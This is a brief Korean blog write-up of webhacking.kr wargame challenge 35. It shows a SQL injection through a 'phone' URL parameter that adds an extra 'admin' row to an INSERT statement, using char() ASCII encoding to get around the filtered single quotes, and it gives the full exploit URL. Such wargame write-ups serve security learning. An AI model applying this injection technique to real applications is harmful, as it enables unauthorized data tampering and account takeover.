hOwDayS 선린 10720
challenge 35 본문
admin , ip , dummy 를 넣어야 된다
insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]',$_GET[phone),
010),('admin','1.236.88.213',010 을 넣으면
insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]', 010),('admin','1.236.88.213',010)
' 가 안되므로 char 로 이용해 아스키코드로 입력한다
http://webhacking.kr/challenge/web/web-17/index.php?phone=010),(char(97,100,109,105,110),char(49,46,50,51,54,46,56,56,46,50,49,51),010
'공부 > webhacking.kr' 카테고리의 다른 글
challenge 26 (0) | 2018.02.02 |
---|---|
challenge 22 (0) | 2018.02.02 |
Comments